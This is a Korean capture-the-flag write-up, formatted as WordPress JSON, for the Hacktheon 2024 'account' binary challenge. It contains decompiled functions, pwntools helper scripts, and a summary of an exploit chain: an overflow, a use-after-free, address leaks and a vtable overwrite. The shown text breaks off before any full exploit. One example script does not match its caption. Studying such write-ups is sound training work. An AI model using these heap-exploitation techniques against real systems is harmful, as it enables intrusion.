{"id":3299,"date":"2025-04-12T00:51:56","date_gmt":"2025-04-11T15:51:56","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3299"},"modified":"2025-04-12T01:02:42","modified_gmt":"2025-04-11T16:02:42","slug":"%ed%95%b5%ed%85%8c%ec%98%a8-2024-account","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3299","title":{"rendered":"[\ud575\ud14c\uc628 2024] account"},"content":{"rendered":"\n
\"\"<\/figure>\n\n\n\n

\uc694\uc57d<\/h3>\n\n\n\n

\uc5ec\ub7ec \ub514\ubc84\uae45\ud558\uba74\uc11c \uc2dc\ud589\ucc29\uc624\ub97c<\/strong> \uacaa\uc740 \uae00.<\/p>\n\n\n\n

\ud575\ud14c\uc628 \ucd08\uae09 \ubb38\uc81c\uc758 \uac00\uc7a5 \ub09c\uc774\ub3c4\uac00 \ub192\uc740 \ubb38\uc81c\uac00 \uc5b4\ub290\uc815\ub3c4\uc778\uc9c0 \ub290\ub084 \uc218 \uc788\uc5c8\uc74c. \uc2a4\ud0ac \ud68d\ubcf5\ud558\ub294\ub370 \uc0c1\ub2f9\ud55c \ub178\ub825 \ud544\uc694\u2026! IDA Pro\ub85c \uad6c\uc870\uccb4 \uc5b4\ucf00 \uc0dd\uc131\ud558\ub294\uc9c0 \uc5f0\uc2b5\ud558\ub294\ub370 \uc88b\uc740 \uae30\ud68c.<\/p>\n\n\n\n

\ud574\ub2f9 \ubb38\uc81c\ub294 utf-8\/utf-16 \ud0c0\uc785\uc758 \uc784\uc758\uc758 \ub370\uc774\ud130\uc640 \ud568\uaed8 account \uc0dd\uc131\uc2dc\ud0ac \uc218 \uc788\uc74c.<\/p>\n\n\n\n

\uccab\ubc88\uc9f8 \ubc84\uadf8\ub294 \uadf8\ub8f9 \uc0dd\uc131\ud6c4, utf-8 + account\ub97c utf 16 \ud0c0\uc785\uc73c\ub85c \ubc14\uafd4\uc11c \ucd5c\ub300 \ud06c\uae30\uc758 \ubb38\uc790\uc5f4\uacfc \ud568\uaed8 \uc218\uc815\ud574\ubc84\ub9ac\uba74 \ud560\ub2f9 \ubc14\ub85c \ub05d\uc5d0 \uc788\ub294 group \uad6c\uc870\uccb4\uc758 account_count\ub97c 0\uc73c\ub85c \ub36e\uc5b4\uc4f8 \uc218 \uc788\uc74c.<\/p>\n\n\n\n

\uadf8\ub7ec\uba74, group\uc5d0 account\uac00 \uc788\ub354\ub77c\ub3c4 delete_group<\/code> \uc218\ud589 \uac00\ub2a5.<\/p>\n\n\n\n

\ubc84\uadf8\ub85c \uc544\ub798 \uacfc\uc815\uc744 5\ubc88 \uc218\ud589\ud588\uc744\ub54c make_group()<\/code> \u2192 add_account_to_group(group_index, b\"\\x01\")<\/code> \u2192 modify_account_data(False, b\"\\x02\", b\"D\"*8)<\/code> “-> delete_group(b\"\\x00\")<\/code><\/p>\n\n\n\n

count\ub97c \uacc4\uc18d \uc99d\uac00\uc2dc\ucf1c 0xff<\/code> \uc5d0\uc11c \ub354 \uc99d\uac00\uc2dc\ud0a4\uba74, 1\ubc88\uca30 \uc778\ub371\uc2a4\uc758 account\uc758 count<\/code> \ud544\ub4dc\ub97c \ub2e4\uc2dc 0\ubd80\ud130 \ub9cc\ub4e4\uc5b4\uc904 \uc218 \uc788\ub2e4,<\/p>\n\n\n\n

make_group() \u2192 add_account_to_group(group_index, b\"\\x01\")<\/code> \ud55c \ub2e4\uc74c, delete_account_from_group(group_index, b\"\\x01\")<\/code> \ub97c \ud1b5\ud574 free.<\/p>\n\n\n\n

group_index = make_group()<\/code> \ub97c \ud1b5\ud574 use. \uc989 \ub450\ubc88\uc9f8 \ubc84\uadf8\ub294 use-after-free.<\/p>\n\n\n\n

\ub450\ubc88\uca30 \ubc84\uadf8\ub97c \ud1b5\ud574 heap_base<\/code> \uc8fc\uc18c \ub204\ucd9c, libc_base<\/code> \uc8fc\uc18c \ud68d\ub4dd, vtable<\/code>\uc744 \uc870\uc791\ud558\uc5ec \uc6d0\uac00\uc82f\uc73c\ub85c \ub36e\uc5b4\uc368\uc11c add_account_to_group<\/code> \ud2b8\ub9ac\uac70\uc2dc \uc6d0\uac00\uc82f \ud638\ucd9c.<\/p>\n\n\n\n

checksec<\/h1>\n\n\n\n
ubuntu@2d0f4d9a440c:~\/hto2024\/account$ checksec .\/account\n[*] '\/home\/ubuntu\/hto2024\/account\/account'\n    Arch:       amd64-64-little\n    RELRO:      Full RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled<\/pre>\n\n\n\n
Analysis<\/h1>\n\n\n\n
main<\/h3>\n\n\n\n
268\ubc14\uc774\ud2b8\uc758 s \ubcc0\uc218\ub97c 258\ub9cc\ud07c 0\uc73c\ub85c \ucd08\uae30\ud654.<\/p>\n\n\n\n
s \ubcc0\uc218\uc5d0 256\ub9cc\ud07c \uc785\ub825\ubc1b\uace0, v3\uc5d0 \uc785\ub825\ubc14\uc774\ud2b8 \uc218\uac00 \ub4e4\uc5b4\uac10.<\/p>\n\n\n\n
s \ubcc0\uc218, \ubc14\uc774\ud2b8\uc218\uc640 \ud568\uaed8 sub_2900<\/code> \ud638\ucd9c.<\/p>\n\n\n\n
unsigned __int64 sub_11D0()\n{\n  setvbuf(stdin, 0, 2, 0);\n  setvbuf(stdout, 0, 2, 0);\n  setvbuf(stderr, 0, 2, 0);\n  return __readfsqword(0x28u);\n}\n\nvoid __fastcall __noreturn main(__int64 a1, char **a2, char **a3)\n{\n  unsigned int v3; \/\/ [rsp+Ch] [rbp-114h]\n  _BYTE s[268]; \/\/ [rsp+10h] [rbp-110h] BYREF\n  int v5; \/\/ [rsp+11Ch] [rbp-4h]\n\n  v5 = 0;\n  sub_11D0();\n  while ( 1 )\n  {\n    memset(s, 0, 258u);\n    v3 = read(0, s, 256u);\n    sub_2900(s, v3);\n  }\n}<\/pre>\n\n\n\n
sub_2900<\/h3>\n\n\n\n
\uc804\uc1a1\ub418\ub294 \uccab<\/strong>\ubc14\uc774\ud2b8 \uba54\ub274\uc5d0\ub294 \ub2e4\uc74c\uacfc \uac19\uc74c. \ubaa8\ub4e0 \uba54\ub274\ub294 \ud568\uc218 \ub9ac\ud134\uac12 \u201c%c\u201d<\/code>\ub85c \ucd9c\ub825.<\/p>\n\n\n\n
    \n
  • \\x00<\/code> \u2192 sub_1490<\/code>\n
      \n
    • \ub9e4\uac1c\ubcc0\uc218 2\uac1c: a1[1]<\/code>, a1 + 2<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n
    • \\x01<\/code> \u2192 sub_1710<\/code>\n
        \n
      • \ub9e4\uac1c\ubcc0\uc218 1\uac1c: a1[1]<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n
      • \\x02<\/code> \u2192 sub_1AE0<\/code>\n
          \n
        • \ub9e4\uac1c\ubcc0\uc218 3\uac1c: a1[2], a1[1], a1 + 3<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n
        • \\x10<\/code> \u2192 sub_1D30<\/code>\n
            \n
          • \ub9e4\uac1c\ubcc0\uc218 0\uac1c<\/li>\n<\/ul>\n<\/li>\n\n\n\n
          • \\x11<\/code> \u2192 v12 = a1 + 1;<\/code> v11 = qword_60D0[*v12];<\/code> v10 = (*(__int64 (__fastcall **)(_QWORD))(*(_QWORD *)(v11 + 16) + 8LL))(*v12);<\/code><\/li>\n\n\n\n
          • \\x12<\/code> \u2192 v9 = qword_60D0[(unsigned __int8)a1[1]];<\/code> v8 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*(_QWORD *)(v9 + 16) + 16LL))( (unsigned __int8)a1[1], (unsigned __int8)a1[2]);<\/code><\/li>\n\n\n\n
          • \\x13<\/code> \u2192 v7 = qword_60D0[(unsigned __int8)a1[1]];<\/code> v6 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*(_QWORD *)(v7 + 16) + 24LL))( (unsigned __int8)a1[1], (unsigned __int8)a1[2]);<\/code><\/li>\n\n\n\n
          • \\x14<\/code> \u2192 v4 = qword_60D0[*v5]; v3 = (*(__int64 (__fastcall **)(_QWORD))(*(_QWORD *)(v4 + 16) + 32LL))(*v5);<\/code><\/li>\n<\/ul>\n\n\n\n
            __int64 __fastcall sub_2900(_BYTE *a1, unsigned int a2)\n{\n  unsigned __int8 v3; \/\/ [rsp+1Fh] [rbp-B1h]\n  __int64 v4; \/\/ [rsp+20h] [rbp-B0h]\n  unsigned __int8 *v5; \/\/ [rsp+28h] [rbp-A8h]\n  unsigned __int8 v6; \/\/ [rsp+37h] [rbp-99h]\n  __int64 v7; \/\/ [rsp+38h] [rbp-98h]\n  unsigned __int8 v8; \/\/ [rsp+4Fh] [rbp-81h]\n  __int64 v9; \/\/ [rsp+50h] [rbp-80h]\n  unsigned __int8 v10; \/\/ [rsp+67h] [rbp-69h]\n  __int64 v11; \/\/ [rsp+68h] [rbp-68h]\n  unsigned __int8 *v12; \/\/ [rsp+70h] [rbp-60h]\n  unsigned __int8 v13; \/\/ [rsp+7Eh] [rbp-52h]\n  unsigned __int8 v14; \/\/ [rsp+7Fh] [rbp-51h]\n  unsigned __int8 v15; \/\/ [rsp+8Fh] [rbp-41h]\n  unsigned __int8 v16; \/\/ [rsp+9Fh] [rbp-31h]\n  unsigned int v17; \/\/ [rsp+C4h] [rbp-Ch]\n\n  if ( a2 )\n  {\n    switch ( *a1 )\n    {\n      case 0:\n        if ( a2 < 3 )\n          goto LABEL_2;\n        v16 = sub_1490(a1[1], a1 + 2);\n        printf(\"%c\", v16);\n        v17 = v16;\n        break;\n      case 1:\n        if ( a2 != 2 )\n          goto LABEL_29;\n        v15 = sub_1710(a1[1]);\n        printf(\"%c\", v15);\n        v17 = v15;\n        break;\n      case 2:\n        if ( a2 < 4 )\n          goto LABEL_29;\n        v14 = sub_1AE0(a1[2], a1[1], a1 + 3);\n        printf(\"%c\", v14);\n        v17 = v14;\n        break;\n      case 0x10:\n        v13 = sub_1D30();\n        printf(\"%c\", v13);\n        v17 = v13;\n        break;\n      case 0x11:\n        if ( a2 != 2 )\n          goto LABEL_29;\n        v12 = a1 + 1;\n        if ( (unsigned __int8)a1[1] >= 16u )\n          goto LABEL_32;\n        v11 = qword_60D0[*v12];\n        if ( !v11 )\n          goto LABEL_32;\n        v10 = (*(__int64 (__fastcall **)(_QWORD))(*(_QWORD *)(v11 + 16) + 8LL))(*v12);\n        printf(\"%c\", v10);\n        v17 = v10;\n        break;\n      case 0x12:\n        if ( a2 != 3 )\n          goto LABEL_29;\n        if ( (unsigned __int8)a1[1] >= 0x10u )\n          goto LABEL_32;\n        v9 = qword_60D0[(unsigned __int8)a1[1]];\n        if ( !v9 )\n          goto LABEL_32;\n        v8 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*(_QWORD *)(v9 + 16) + 16LL))(\n               (unsigned __int8)a1[1],\n               (unsigned __int8)a1[2]);\n        printf(\"%c\", v8);\n        v17 = v8;\n        break;\n      case 0x13:\n        if ( a2 != 3 )\n          goto LABEL_29;\n        if ( (unsigned __int8)a1[1] >= 0x10u )\n          goto LABEL_32;\n        v7 = qword_60D0[(unsigned __int8)a1[1]];\n        if ( !v7 )\n          goto LABEL_32;\n        v6 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*(_QWORD *)(v7 + 16) + 24LL))(\n               (unsigned __int8)a1[1],\n               (unsigned __int8)a1[2]);\n        printf(\"%c\", v6);\n        v17 = v6;\n        break;\n      case 0x14:\n        if ( a2 == 2 )\n        {\n          v5 = a1 + 1;\n          if ( (unsigned __int8)a1[1] < 0x10u && (v4 = qword_60D0[*v5]) != 0 )\n          {\n            v3 = (*(__int64 (__fastcall **)(_QWORD))(*(_QWORD *)(v4 + 16) + 32LL))(*v5);\n            printf(\"%c\", v3);\n            v17 = v3;\n          }\n          else\n          {\nLABEL_32:\n            fprintf(stderr, \"invalid group id\\n\");\n            v17 = -1;\n          }\n        }\n        else\n        {\nLABEL_29:\n          fprintf(stderr, \"invalid packet length\\n\");\n          v17 = -1;\n        }\n        break;\n      default:\n        fprintf(stderr, \"invalid call_number\\n\");\n        v17 = -1;\n        break;\n    }\n  }\n  else\n  {\nLABEL_2:\n    fprintf(stderr, \"invalid length\\n\");\n    return (unsigned int)-1;\n  }\n  return v17;\n}<\/pre>\n\n\n\n
            sub_1490 (make_account)<\/h3>\n\n\n\n
              \n
            • \ub9e4\uac1c\ubcc0\uc218 account_type<\/code>\uc740 2\ubc88\uc9f8 \ubc14\uc774\ud2b8, data<\/code>\ub294 3\ubc88\uc9f8 \ubc14\uc774\ud2b8\ubd80\ud130 \ub4e4\uc5b4\uac10<\/li>\n\n\n\n
            • account_type<\/code> \uc774 1\uc774\uc5ec\uc57c\ud568<\/strong>, \uc544\ub2c8\uba74 \"invalid account type\u201d<\/code> \uc5d0\ub7ec<\/li>\n\n\n\n
            • \ucd5c\ub300 \uacc4\uc815\uc744 16\uac1c\uae4c\uc9c0\ub9cc \uc0dd\uc131 \uac00\ub2a5.<\/li>\n<\/ul>\n\n\n\n
              __int64 __fastcall make_account(char account_type, char *data)\n{\n  signed __int64 v2; \/\/ rax\n  void *v3; \/\/ rsp\n  void *v4; \/\/ rsp\n  signed __int64 v6; \/\/ [rsp+18h] [rbp-28h]\n  int v7; \/\/ [rsp+20h] [rbp-20h]\n  int v8; \/\/ [rsp+20h] [rbp-20h]\n  int i; \/\/ [rsp+24h] [rbp-1Ch]\n\n  for ( i = 0; ; ++i )\n  {\n    if ( i >= 16 )\n    {\n      fprintf(stderr, \"no more account\\n\");\n      return (unsigned __int8)-1;\n    }\n    if ( !account_id_array[i] )\n      break;\n  }\n  if ( !account_type )\n  {\n    v8 = utf16_strlen(data);\n    if ( !v8 )\n      goto LABEL_7;\n    v2 = (unsigned int)(2 * (v8 + 1));\n    goto LABEL_12;\n  }\n  if ( account_type != 1 )\n    goto LABEL_11;\n  v7 = strlen(data);\n  if ( !v7 )\n  {\nLABEL_7:\n    fprintf(stderr, \"invalid length\\n\");\n    return (unsigned __int8)-1;\n  }\n  v2 = (unsigned int)(v7 + 1);\nLABEL_12:\n  v3 = alloca(v2);\n  v6 = v2;\n  v4 = alloca(v2);\n  if ( v2 )\n  {\n    *(_BYTE *)v2 = account_type;\n    *(_BYTE *)(v2 + 1) = 0;\n    *(_QWORD *)(v2 + 8) = v2;\n    if ( !account_type )\n    {\n      utf16_strcpy((_BYTE *)v2, data);\n      goto LABEL_19;\n    }\n    if ( account_type == 1 )\n    {\n      strcpy((char *)v2, data);\nLABEL_19:\n      account_id_array[i] = v6;\n      sub_12C0(i);\n      return (unsigned __int8)i;\n    }\nLABEL_11:\n    fprintf(stderr, \"invalid account type\\n\");\n    return (unsigned __int8)-1;\n  }\n  fprintf(stderr, \"failed to allocate memory\\n\");\n  return (unsigned __int8)-1;\n}<\/pre>\n\n\n\n
              \uc608\uc81c \ucf54\ub4dc:<\/strong> A 16\ubc14\uc774\ud2b8 \ub370\uc774\ud130\uc640 \ud568\uaed8 account \ucd94\uac00 \uc0dd\uc131<\/p>\n\n\n\n
              from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account')\n\ndef make_account(data):\n    _menu = b\"\\x00\"\n    _type = b\"\\x01\"\n    _data = data\n\n    payload = _menu + _type + _data\n\n    p.sendline(payload)\n    return p.recv(1)\n\nr = make_account(b\"A\"*16)\ninfo(f\"make_account r: {r}\")\n\np.interactive()<\/pre>\n\n\n\n
              \uc608\uc81c \ucf54\ub4dc \uacb0\uacfc:<\/p>\n\n\n\n
              \"\"<\/figure>\n\n\n\n
              \"\"<\/figure>\n\n\n\n
              sub_1710 (delete_account)<\/h3>\n\n\n\n
                \n
              • 2\ubc88\uc9f8 \ubc14\uc774\ud2b8\uc778 a1<\/code>\uc774 \uace7 account_id_array<\/code>\uc758 \uc778\ub371\uc2a4\uac00 \ub428.<\/li>\n\n\n\n
              • \uc0ad\uc81c\ud558\ub824\ub294 account\uac00 \uc0ac\uc6a9\uc911\uc778 \uacbd\uc6b0(still in use), \uc0ad\uc81c \ubd88\uac00.<\/li>\n<\/ul>\n\n\n\n
                __int64 __fastcall delete_account(unsigned __int8 a1)\n{\n  __int64 v2; \/\/ [rsp+8h] [rbp-18h]\n\n  if ( a1 < 0x10u && (v2 = account_id_array[a1]) != 0 )\n  {\n    if ( *(_BYTE *)(v2 + 1) == 1 )\n    {\n      if ( (unsigned __int8)sub_1390(a1) )\n      {\n        fprintf(stderr, \"unexpected flow\\n\");\n        return (unsigned int)-1;\n      }\n      else\n      {\n        account_id_array[a1] = 0;\n        return 0;\n      }\n    }\n    else\n    {\n      fprintf(stderr, \"account is still in use\\n\");\n      return (unsigned int)-1;\n    }\n  }\n  else\n  {\n    fprintf(stderr, \"invalid account id\\n\");\n    return (unsigned int)-1;\n  }\n}\n\n__int64 __fastcall sub_1390(unsigned __int8 a1)\n{\n  __int64 v2; \/\/ [rsp+8h] [rbp-18h]\n\n  if ( a1 < 0x10u && (v2 = account_id_array[a1]) != 0 )\n  {\n    if ( !--*(_BYTE *)(v2 + 1) )\n    {\n      sub_2840(*(_QWORD *)(v2 + 8));\n      sub_2840(v2);\n    }\n    return *(unsigned __int8 *)(v2 + 1);\n  }\n  else\n  {\n    fprintf(stderr, \"invalid account id\\n\");\n    return (unsigned __int8)-1;\n  }\n}<\/pre>\n\n\n\n
                \uc608\uc81c \ucf54\ub4dc: <\/strong>
                1. A 16\ubc14\uc774\ud2b8 \ub370\uc774\ud130\uc640 \ud568\uaed8 account \ucd94\uac00 \uc0dd\uc131 (0\ubc88\uc9f8 \uc778\ub371\uc2a4 \ucd94\uac00) 
                2. 0\ubc88\uc9f8 \uc778\ub371\uc2a4\uc5d0 \ucd94\uac00\ub41c account \uc0ad\uc81c<\/strong><\/p>\n\n\n\n
                from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account')\n\ndef make_account(data):\n    _menu = b\"\\x00\"\n    _type = b\"\\x01\"\n    _data = data\n\n    payload = _menu + _type + _data\n\n    p.sendline(payload)\n    return p.recv(1)\n\nr = make_account(b\"A\"*16)\ninfo(f\"make_account r: {r}\")\n\np.interactive()<\/pre>\n\n\n\n
                \uc608\uc81c \ucf54\ub4dc \uacb0\uacfc: account_id_array[0] = 0<\/code><\/strong><\/p>\n\n\n\n
                \"\"<\/figure>\n\n\n\n
                MEMORY:00007FFFF7FFA000 dq 1<\/code> (0x101\uc5d0\uc11c 1\ub85c \ubcc0\ub3d9)<\/strong><\/p>\n\n\n\n
                \"\"<\/figure>\n\n\n\n
                sub_1AE0 (modify_account_data)<\/h3>\n\n\n\n
                  \n
                • \ub9e4\uac1c\ubcc0\uc218 3\uac1c: a1[2], a1[1], a1 + 3<\/code><\/li>\n\n\n\n
                • make_account<\/code> \ud588\uc744\ub54c 0x7FFFF7FFA000 \uc8fc\uc18c\uc5d0 \\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00<\/code> \uac12\uc774 \uc788\uc5b4 \uccab\ubc14\uc774\ud2b8\ub294 \\x01,<\/code> \uc989 if ( *(_BYTE *)v5 != 1 )<\/code> \uc131\ub9bd X<\/li>\n\n\n\n
                • v4 = strlen(*(const char **)(v5 + 8)) + 1;<\/code> \uc218\ud589\ud558\ubbc0\ub85c, is_utf8_type<\/code>\ub3c4 \ud615\uc2dd\uc5d0 \ub9de\uac8c true \uc5ec\uc57c\ud568.<\/li>\n\n\n\n
                • \uc774\uc804\uc5d0 make_account<\/code> \ud588\uc744\ub54c\uc758 \uae38\uc774\ubcf4\ub2e4 \ucd5c\ub300 +1\uae4c\uc9c0 \ub298\uc77c \uc218 \uc788\uc74c, \ub9c8\uc9c0\ub9c9 \ubc14\uc774\ud2b8\ub294 \\x00<\/code>\uc73c\ub85c \ub36e\uc5b4\uc368\uc9d0 
                  ex: make_account<\/code> \ud588\uc744\ub54c A 16\uac1c, modify_account_data<\/code>\ud588\uc744\ub54c B 17\uac1c + \\x00<\/code>\uc73c\ub85c \uc218\uc815 \uac00\ub2a5.<\/li>\n<\/ul>\n\n\n\n
                  __int64 __fastcall modify_account_data(char is_utf8_type, unsigned __int8 account_index, char *data)\n{\n  unsigned int v4; \/\/ [rsp+Ch] [rbp-24h]\n  __int64 v5; \/\/ [rsp+10h] [rbp-20h]\n\n  if ( account_index < 0x10u )\n  {\n    v5 = account_id_array[account_index];\n    if ( v5 )\n    {\n      if ( *(_BYTE *)v5 )\n      {\n        if ( *(_BYTE *)v5 != 1 )\n        {\nLABEL_8:\n          fprintf(stderr, \"unexpected\\n\");\n          return (unsigned int)-1;\n        }\n        v4 = strlen(*(const char **)(v5 + 8)) + 1;\n      }\n      else\n      {\n        v4 = 2 * (utf16_strlen(*(_BYTE **)(v5 + 8)) + 1);\n      }\n      if ( !is_utf8_type )\n      {\n        if ( 2 * utf16_strlen(data) >= (unsigned __int64)v4 )\n          goto LABEL_12;\n        utf16_strcpy(*(_BYTE **)(v5 + 8), data);\n        *(_BYTE *)v5 = 0;\n        goto LABEL_17;\n      }\n      if ( is_utf8_type == 1 )\n      {\n        if ( strlen(data) >= v4 )\n        {\nLABEL_12:\n          fprintf(stderr, \"invalid length\\n\");\n          return (unsigned int)-1;\n        }\n        strcpy(*(char **)(v5 + 8), data);\n        *(_BYTE *)v5 = 1;\nLABEL_17:\n        sub_1860(v5);\n        return 0;\n      }\n      goto LABEL_8;\n    }\n  }\n  fprintf(stderr, \"invalid account id\\n\");\n  return (unsigned int)-1;\n}<\/pre>\n\n\n\n
                  \uc608\uc81c \ucf54\ub4dc:<\/p>\n\n\n\n
                  from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account')\n\ndef make_account(data):\n    _menu = b\"\\x00\"\n    _type = b\"\\x01\"\n    _data = data\n    payload = _menu + _type + _data\n\n    p.sendline(payload)\n    return p.recv(1)\n\ndef modify_account_Data(is_utf8_type, account_index, data):\n    _menu = b\"\\x02\"\n    if(is_utf8_type):\n        _is_utf8_type = b\"\\x01\"\n    else:\n        _is_utf8_type = b\"\\x00\"\n    payload = _menu + account_index + _is_utf8_type + data\n    \n    p.send(payload)\n    return p.recv()\n\n\n_index = make_account(b\"A\"*16)\ninfo(f\"make_account _index: {_index}\")\n\nr = modify_account_Data(True, b\"\\x00\", b\"B\"*16)\ninfo(f\"modify_account_Data ret: {r}\")\n\np.interactive()<\/pre>\n\n\n\n
                  \uc608\uc81c \ucf54\ub4dc \uacb0\uacfc:<\/p>\n\n\n\n
                  \"\"<\/figure>\n\n\n\n
                  sub_1D30 (make_group)<\/h3>\n\n\n\n
                    \n
                  • \ucd5c\ub300 \uadf8\ub8f9\uc744 16\uac1c\uae4c\uc9c0\ub9cc \uc0dd\uc131 \uac00\ub2a5.<\/li>\n<\/ul>\n\n\n\n
                    __int64 sub_1D30()\n{\n  void *v0; \/\/ rsp\n  void *v1; \/\/ rsp\n  int i; \/\/ [rsp+10h] [rbp-10h]\n\n  for ( i = 0; ; ++i )\n  {\n    if ( i >= 16 )\n    {\n      fprintf(stderr, \"no more group\\n\");\n      return (unsigned __int8)-1;\n    }\n    if ( !qword_60D0[i] )\n      break;\n  }\n  v0 = alloca((signed __int64)qword_60D0);\n  if ( qword_60D0\n    && (LODWORD(qword_60D0[0]) = 0, v1 = alloca((signed __int64)qword_60D0), (qword_60D0[1] = qword_60D0) != 0) )\n  {\n    memset((void *)qword_60D0[1], 0, 0x80u);\n    qword_60D0[2] = &off_6010;\n    qword_60D0[i] = qword_60D0;\n    return (unsigned __int8)i;\n  }\n  else\n  {\n    fprintf(stderr, \"failed to allocate memory\\n\");\n    return (unsigned __int8)-1;\n  }\n}<\/pre>\n\n\n\n
                    \uc608\uc81c \ucf54\ub4dc:<\/p>\n\n\n\n
                    from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account')\n\ndef make_group():\n    _menu = b\"\\x10\"\n    \n    p.send(_menu)\n    return p.recv(1)\n\n_index = make_group()\ninfo(f\"make_group _index: {_index}\")\n\np.interactive()<\/pre>\n\n\n\n
                    \uc608\uc81c \ucf54\ub4dc \uacb0\uacfc:<\/p>\n\n\n\n
                    \"\"<\/figure>\n\n\n\n
                    \"\"<\/figure>\n\n\n\n
                    \"\"<\/figure>\n\n\n\n
                    delete_group (sub_1EA0)<\/h3>\n\n\n\n
                      \n
                    • v10 = ((__int64 (__fastcall **)(_QWORD))((_QWORD *)(v11 + 16) + 8LL))(*v12);<\/code><\/li>\n<\/ul>\n\n\n\n
                      __int64 __fastcall delete_group(unsigned __int8 group_index)\n{\n  group *v2; \/\/ [rsp+8h] [rbp-18h]\n\n  if ( group_index < 0x10u && (v2 = (group *)group_array[group_index]) != 0 )\n  {\n    if ( *(_DWORD *)v2->gap0 )\n    {\n      fprintf(stderr, \"group is not empty\\n\");\n      return (unsigned int)-1;\n    }\n    else\n    {\n      sub_2840((__int64)v2->group_data);\n      sub_2840((__int64)v2);\n      group_array[group_index] = 0;\n      return 0;\n    }\n  }\n  else\n  {\n    fprintf(stderr, \"invalid group id\\n\");\n    return (unsigned int)-1;\n  }\n}\n\n__int64 __fastcall sub_2840(__int64 a1)\n{\n  __int64 i; \/\/ [rsp+10h] [rbp-20h]\n\n  for ( i = *(_QWORD *)(qword_6150 + 16); i; i = *(_QWORD *)(i + 16) )\n  {\n    if ( *(_QWORD *)(i + 8) == a1 )\n    {\n      *(_BYTE *)i = 2;\n      return 0;\n    }\n  }\n  fprintf(stderr, \"invalid ptr\\n\");\n  return (unsigned int)-1;\n}<\/pre>\n\n\n\n
                      \uc608\uc81c \ucf54\ub4dc:<\/p>\n\n\n\n
                      from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account')\n\ndef make_group():\n    _menu = b\"\\x10\"\n    \n    p.send(_menu)\n    return p.recv(1)\n\ndef delete_group(group_index):\n    _menu = b\"\\x11\"\n\n    p.send(_menu + group_index)\n    return p.recv(1)\n\n_index = make_group()\ninfo(f\"make_group _index: {_index}\")\n\n_index = delete_group(_index)\ninfo(f\"delete_group _index: {_index}\")<\/pre>\n\n\n\n
                      \uc608\uc81c \ucf54\ub4dc \uacb0\uacfc:<\/p>\n\n\n\n
                      \"\"<\/figure>\n\n\n\n
                      \"\"<\/figure>\n\n\n\n
                      add_account_to_group (sub_1FC0)<\/h3>\n\n\n\n
                      __int64 __fastcall add_account_to_group(unsigned __int8 group_index, unsigned __int8 account_index)\n{\n  int j; \/\/ [rsp+8h] [rbp-28h]\n  int i; \/\/ [rsp+Ch] [rbp-24h]\n  __int64 v5; \/\/ [rsp+10h] [rbp-20h]\n  group *v6; \/\/ [rsp+18h] [rbp-18h]\n\n  if ( group_index >= 0x10u )\n    goto LABEL_2;\n  if ( account_index >= 0x10u )\n    goto LABEL_4;\n  v6 = (group *)group_array[group_index];\n  if ( !v6 )\n  {\nLABEL_2:\n    fprintf(stderr, \"invalid group id\\n\");\n    return (unsigned __int8)-1;\n  }\n  if ( *(_DWORD *)v6->gap0 >= 0x10u )\n  {\n    fprintf(stderr, \"group is full\\n\");\n    return (unsigned __int8)-1;\n  }\n  v5 = account_id_array[account_index];\n  if ( !v5 )\n  {\nLABEL_4:\n    fprintf(stderr, \"invalid account id\\n\");\n    return (unsigned __int8)-1;\n  }\n  for ( i = 0; i < 16; ++i )\n  {\n    if ( *((_QWORD *)v6->group_data + i) == v5 )\n    {\n      fprintf(stderr, \"account is already in the group\\n\");\n      return (unsigned __int8)-1;\n    }\n  }\n  for ( j = 0; j < 16; ++j )\n  {\n    if ( !*((_QWORD *)v6->group_data + j) )\n    {\n      *((_QWORD *)v6->group_data + j) = v5;\n      ++*(_DWORD *)v6->gap0;\n      sub_12C0(account_index);\n      return 0;\n    }\n  }\n  return 0;\n}\n\n__int64 __fastcall sub_12C0(unsigned __int8 account_index)\n{\n  __int64 v2; \/\/ [rsp+8h] [rbp-18h]\n\n  if ( account_index < 0x10u && (v2 = account_id_array[account_index]) != 0 )\n  {\n    return (unsigned __int8)++*(_BYTE *)(v2 + 1);\n  }\n  else\n  {\n    fprintf(stderr, \"invalid account id\\n\");\n    return (unsigned __int8)-1;\n  }\n}<\/pre>\n\n\n\n
                      from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account')\n\ndef make_account(data):\n    _menu = b\"\\x00\"\n    _type = b\"\\x01\"\n    _data = data\n    payload = _menu + _type + _data\n\n    p.sendline(payload)\n    return p.recv(1)\n\ndef make_group():\n    _menu = b\"\\x10\"\n    \n    p.send(_menu)\n    return p.recv(1)\n\ndef add_account_to_group(group_index, account_index):\n    _menu = b\"\\x12\"\n    \n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\naccount_index = make_account(b\"A\"*16)\ninfo(f\"make_account _index: {account_index}\")\n\ngroup_index = make_group()\ninfo(f\"make_group _index: {group_index}\")\n\nr = add_account_to_group(account_index, group_index)\ninfo(f\"add_account_to_group r: {r}\")<\/pre>\n\n\n\n
                      \"\"<\/figure>\n\n\n\n
                      account_id_array[0], 00007FFFF7FFA000 + 0x1<\/code> \ubc14\uc774\ud2b8\uac00 1 \u2192 2\ub85c \ubcc0\uacbd<\/strong><\/p>\n\n\n\n
